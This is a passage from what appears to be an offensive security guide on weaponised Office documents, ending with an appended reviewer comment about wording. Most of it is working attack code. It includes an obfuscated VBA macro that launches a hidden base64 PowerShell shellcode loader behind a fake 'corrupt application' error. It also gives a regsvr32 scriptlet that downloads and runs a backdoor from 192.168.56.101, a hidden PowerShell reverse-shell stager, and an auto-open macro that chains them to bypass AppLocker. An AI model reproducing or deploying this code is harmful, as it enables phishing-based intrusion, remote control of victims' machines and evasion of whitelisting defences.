    & "AzACwAMAB4AGUAZgAsADAAeAA3AGEALAAwAHgAMwA4ACwAMAB4ADYAMgAsADAAeAA2ADUALAAwAHgANwBiACwAMAB4ADUAMAAsADAAeABkADIALAAwAHgAZABkACwAMAB4ADIAOAAsADAAeAA0ADUALAAwAHgAMQBkACwAMAB4AGMAOAAsADAAeAA1AGMALAAwAHgAZAA2ACwAMAB4ADgAOAAsADAA'+'eABmADMALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAxAGIALAAwAHgAOQBjACwAMAB4AGIAYQAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADAAMwAsADAAeAA0ADQALAAwAHgAZAAxACwAMAB4ADYAYwA" _
    & "sADAAeAA3AGYALAAwAHgAOQAzACwAMAB4ADEAZgAsADAAeAAxAGIALAAwAHgAOQAxACwAMAB4ADIANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACk'+'AewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAUwBUAGsAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAg" _
    & "ACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFMAVABrAC4AVABvAEkAbgB0AD'+'MAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABTAFQAawAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5A" _
    & "HMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlA'+'G0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEMASAB4ACkAKQA7ACQATABtAE8AIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQATwBiAEUAdgAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgAC" _
    & "sAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQ'+'AG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABPAGIARQB2ACAAJABMAG0ATwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABMAG0ATwAgACQAZQAiADsAfQA=')"""
    Dim EUrxrXO
    EUrxrXO = "S" & "h" & "e" & "l" & "l"
    Dim aHiMN
    aHiMN = "W" & "S" & "c" & "r" & "i" & "p" & "t"
    Dim XkOPOzVOswzjeFO
    XkOPOzVOswzjeFO = aHiMN & "." & EUrxrXO
    Dim DxDAIPQizB
    Dim ToHtLtKuKfUGc
    Set DxDAIPQizB = VBA.CreateObject(XkOPOzVOswzjeFO)
    Dim jMkUOSWtofK
    jMkUOSWtofK = "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & "." & "e" & "x" & "e" & " "
    ToHtLtKuKfUGc = DxDAIPQizB.Run(jMkUOSWtofK & HsQgOKMOa, 0, False)
    Dim title As String
    title = "Microsoft Office Corrupt Application (Compatibility Mode)"
    Dim msg As String
    Dim intResponse As Integer
    msg = "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]"
    intResponse = MsgBox(msg, 16, title)
    Application.Quit
    End Sub
    ```


    **2. `regsvr32` based method**

    This method works by making built-in Microsoft tool named `regsvr32` that is used for registering and unregistering OLE Controls / ActiveX objects even from remote resources in a form of **scriptlet** files (`.sct`). By leveraging that feature we can supply remotely hosted (on the attacker-controlled web server) malicious _scriptlet_ file that would after being loaded execute arbitrary commands on the victim's machine.

    The biggest advantage of this method is that the `regsvr32` application is by default whitelisted one and therefore can be used for remote code execution within restricted by AppLocker or Software Restriction Policies (SRPs) environment. In other words, if the victim user is disallowed from running untrusted applications, the `regsvr32` will be the one to go for in order to bypass application whitelisting.

    (This technique could be further automated using `exploit/windows/misc/regsvr32_applocker_bypass_server` module in _Metasploit_).

    As an example of such scriptlets we can use one of the [Casey Smith's payloads](https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302):

    **File: `bandit.sct`**
    ```
    <?XML version="1.0"?>
    <scriptlet>
    <registration progid="PqYOEI6w" classid="{057b64c8-1107-cda1-3d34-062978395f62}">
    <script>
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c $r=new-object net.webclient;$r.proxy=[Net.WebRequest]::GetSystemWebProxy();$r.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $r.downloadstring('http://192.168.56.101/backdoor');", 0);
    ]]>
    </script>
    </registration>
    </scriptlet>
    ```

    Then one will have to serve a `backdoor` file on the Web server that would connect back to the listener, for instance CMD Powershell reverse tcp:

    ```
    powershell.exe -nop -w hidden -c 'if([IntPtr]::Size -eq 4){$b=''powershell.exe''}else{$b=$env:windir+''\syswow64\WindowsPowerShell\v1.0\powershell.exe''};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=''-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''''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''''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=''Hidden'';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);'
    ```


    The above file has to be stored on the remotely accessible web server and named for instance **bandit.sct**. Then, we can use the following macro embedded in Office file that will be sent to the victim for opening:

    **Macro/Script to be used in Malicious Document**:
    ```
    Private Sub Document_Open()
    Test
    End Sub
    Private Sub DocumentOpen()
    Test
    End Sub
    Private Sub Auto_Open()
    Test
    End Sub
    Private Sub AutoOpen()
    Test
    End Sub
    Private Sub Auto_Exec()
    Test
    End Sub
    Private Sub Test()
    Dim shell
    Dim out
    Set shell = VBA.CreateObject("WScript.Shell")
    out = shell.Run("regsvr32 /u /n /s /i:http://192.168.56.101/bandit.sct scrobj.dll", 0, False)
    End Sub
    ```

    So the entire attack goes as follows:

    Malicious document with `Run("regsvr32 [...] /i:http://[...]/file.sct")` -> `file.sct` delivers Powershell Download & Exec command (`backdoor`) -> `backdoor` Powershell CMD reverse tcp 2nd stage gets delivered and executed
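Review bot: the `regsvr32` section states the binary "is by default whitelisted one" without saying under which rule set; qualify it as depending on the default AppLocker / SRP rules that allow everything under the Windows directory, because an environment with an explicit deny rule for `regsvr32.exe`, or with command-line logging that records the `/i:http://...` argument visible on the `shell.Run` line, does not behave as the sentence implies. Separately, the page-substitution module declares `Auto_Open` and `Workbook_Open` handlers and comments them as the Excel entry points, yet `SubstitutePage` uses `Word.Document`, `Word.ActiveDocument`, `Selection.WholeStory` and `wdCharacter`, which only resolve with the Word object library referenced; the comments should say the module targets Word only, or the Excel handlers should be dropped.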